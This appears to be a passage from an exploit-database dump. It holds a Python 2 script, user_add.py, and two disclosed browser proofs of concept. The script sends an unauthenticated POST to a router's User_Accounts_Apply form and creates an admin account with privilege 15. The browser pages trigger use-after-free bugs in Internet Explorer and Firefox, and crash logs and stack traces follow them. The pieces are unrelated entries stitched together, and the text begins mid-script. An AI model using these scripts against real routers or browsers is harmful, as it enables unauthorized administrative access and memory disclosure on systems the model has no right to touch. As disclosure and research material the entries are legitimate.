        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit in Python 2.
        return False
    return True
# Runs unconditionally on import/execution; no __main__ guard.
make_requests()
===========
user_add.py
===========
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
    """Calls request functions sequentially.

    Issues the single POST made by request_ip() and prints a fixed message
    depending only on whether any HTTP response came back; the response body
    is decoded but never inspected.
    """
    # One-element list so request_ip() can hand the response object back.
    response = [None]
    responseText = None
    if(request_ip(response)):
        # Success, possibly use response.
        responseText = read_response(response[0])
        # NOTE(review): the message names "dlinktest", but request_ip()
        # submits username=admin2; the printed text does not reflect the
        # request body or the server's answer (an HTTP error also lands here).
        print "Username dlinktest is successfully Added"
        response[0].close()
    else:
        # Failure, cannot use response.
        print "locha"
        pass
def read_response(response):
    """Return the body of an HTTP response, decoding it when compressed.

    Only two Content-Encoding values are handled: 'gzip' and raw 'deflate'
    (no zlib header).  Any other encoding, or none, is returned as read.
    """
    encoding = response.info().get('Content-Encoding')
    raw = response.read()
    if encoding == 'gzip':
        return gzip.GzipFile(fileobj=StringIO(raw)).read()
    if encoding == 'deflate':
        inflater = zlib.decompressobj(-zlib.MAX_WBITS)
        return inflater.decompress(raw) + inflater.flush()
    return raw
def request_ip(response):
    """Tries to request the URL. Returns True if the request was successful; false otherwise.
    http://ip_address/form/User_Accounts_Apply
    response -- After the function has finished, will possibly contain the response to the request.

    "Successful" means any HTTP response was received: an HTTPError that
    carries a .code is stored in response[0] and True is returned.  The POST
    carries no session cookie at all, so the script is checking whether the
    account form accepts an unauthenticated submission.
    """
    response[0] = None
    try:
        # Create request to URL.
        import sys
        # Target host comes from argv[1]; a missing argument raises
        # IndexError, which the bare except below turns into a silent False.
        ip = sys.argv[1]
        req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
        # Set request headers.  Origin/Referer imitate the device's own pages.
        req.add_header("Connection", "keep-alive")
        req.add_header("Cache-Control", "max-age=0")
        req.add_header("Origin", "http://%s/"% ip)
        req.add_header("Upgrade-Insecure-Requests", "1")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
        # Set request body.  Fixed form fields; a POST to this path without
        # a session cookie is the thing to look for in device/web logs.
        body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
        # Get response to request.  Passing a body makes urlopen send a POST.
        response[0] = urllib2.urlopen(req, body)
    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit in Python 2.
        return False
    return True
# Runs unconditionally on import/execution; no __main__ guard.
make_requests()
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076
There is a use-after-free bug in IE which can lead to an info leak / memory disclosure.
The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
// Triggers the condition described above: an iframe is inserted into the
// textarea, the iframe document's readystatechange handler is registered,
// and the form is reset synchronously.  The stack trace further down shows
// reset() reaching CRichtext::SetValueHelperInternal while the handler
// (eventhandler) has already replaced the text value.
function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");
  textarea.appendChild(frame);
  frame.contentDocument.onreadystatechange = eventhandler;
  // `form` is not declared here; presumably resolves to the element with
  // id="form" via window named access -- confirm.
  form.reset();
}
// Runs re-entrantly during form.reset(): assigning defaultValue reallocates
// the textarea's text buffer (see the "!heap -p -a" allocation stack:
// Trampoline_Set_defaultValue -> SetStringProperty -> HeapReAlloc), so the
// pointer held by the in-progress reset becomes stale.  The alert only
// marks the point at which the old value is already freed.
function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}
</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>
<!--
=========================================
Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.
The root cause of the bug is actually a use-after-free on the textarea text value, which can be seen if the PoC is run with Page Heap enabled. In that case IE crashes at
(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=????
0:008> k
# ChildEBP RetAddr
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b
where the old value was deleted at
0:008> !heap -p -a 0e024ffc
address 0e024ffc found in
_DPH_HEAP_ROOT @ f1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
dd03820: e024000 2000
7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
77b6de86 ntdll!RtlReAllocateHeap+0x00000054
71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
71678877 MSHTML!CBase::put_StringHelper+0x0000004d
71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.
Screenshots:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1130
Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340138
There is a use-after-free security vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build.
PoC and ASan log can be found below.
Notes for reproducing:
- PoC uses the domFuzzLite3 extension (https://www.squarefree.com/extensions/domFuzzLite3.xpi) in order to trigger the garbage collector
- After the PoC is opened, it takes about 10 seconds for the crash to occur
PoC:
=================================================================
-->
<style>
body { display: table }
</style>
<script>
// Forces a garbage collection through the domFuzzLite3 extension's
// fuzzPriv.forceGC(); without the extension the call throws and the user is
// told to install it.  The GC is what makes the dangling selection range
// visible (see the ASan heap-use-after-free log below).
function freememory() {
  try { fuzzPriv.forceGC(); } catch(err) { alert('Please install domFuzzLite3'); }
}
// Reproduction steps, in this order: select text inside the table cell via
// window.find(), extend the selection by a line, append a second <table> to
// the body (which is display: table per the <style> above), then force GC.
// The ASan trace shows nsRange::IsNodeSelected being reached from table
// cell display-list building after the range's node has been freed.
function go() {
  var s = document.getSelection();
  // find(string, caseSensitive, backwards, wrapAround, wholeWord)
  window.find("1",true,false,true,false);
  s.modify("extend","forward","line");
  document.body.append(document.createElement("table"));
  freememory()
}
</script>
<body onload=go()>
<table>
<th>u~Z1Cqn`aA}SOkre=]{</th>
</table>
<progress></progress>
<!--
=================================================================
ASan log:
=================================================================
==119582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000214ce8 at pc 0x7f46d6781c12 bp 0x7ffdc29fc1f0 sp 0x7ffdc29fc1e8
READ of size 8 at 0x60b000214ce8 thread T0
#0 0x7f46d6781c11 in operator! /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36
#1 0x7f46d6781c11 in IsInSelection /home/worker/workspace/build/src/dom/base/nsRange.h:120
#2 0x7f46d6781c11 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:202
#3 0x7f46da800fd3 in nsIFrame::IsSelected() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:10107:5
#4 0x7f46daaa29f6 in nsTableCellFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableCellFrame.cpp:539:11
#5 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#6 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
#7 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#8 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#9 0x7f46dab10731 in DisplayRows(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableRowGroupFrame.cpp:231:5
#10 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#11 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#12 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
#13 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#14 0x7f46daabb382 in nsTableFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1373:3
#15 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#16 0x7f46dab24b16 in BuildDisplayListForInnerTable /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:207:5
#17 0x7f46dab24b16 in nsTableWrapperFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:180
#18 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#19 0x7f46da7912d2 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6585:5
#20 0x7f46da7890ce in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6677:7
#21 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#22 0x7f46da7b22f2 in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:558:5
#23 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#24 0x7f46da87ebf2 in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3497:7
#25 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#26 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
#27 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#28 0x7f46da990123 in nsSubDocumentFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:471:7
#29 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#30 0x7f46da78d228 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2910:5
#31 0x7f46dac92672 in nsStackFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsStackFrame.cpp:59:5
#32 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#33 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#34 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#35 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#36 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#37 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#38 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#39 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#40 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#41 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#42 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#43 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#44 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#45 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#46 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#47 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#48 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#49 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#50 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#51 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#52 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#53 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#54 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#55 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#56 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#57 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#58 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#59 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#60 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#61 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#62 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#63 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#64 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#65 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#66 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#67 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#68 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#69 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#70 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#71 0x7f46dac64b7e in nsRootBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsRootBoxFrame.cpp:195:3
#72 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#73 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
#74 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#75 0x7f46da6623a6 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3565:5
#76 0x7f46da565487 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6481:5
#77 0x7f46d9d6c897 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:484:7
#78 0x7f46d9d6be97 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:416:9
#79 0x7f46d9d6f40d in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1105:5
#80 0x7f46da4bfc8a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2037:7
#81 0x7f46da4cbd25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
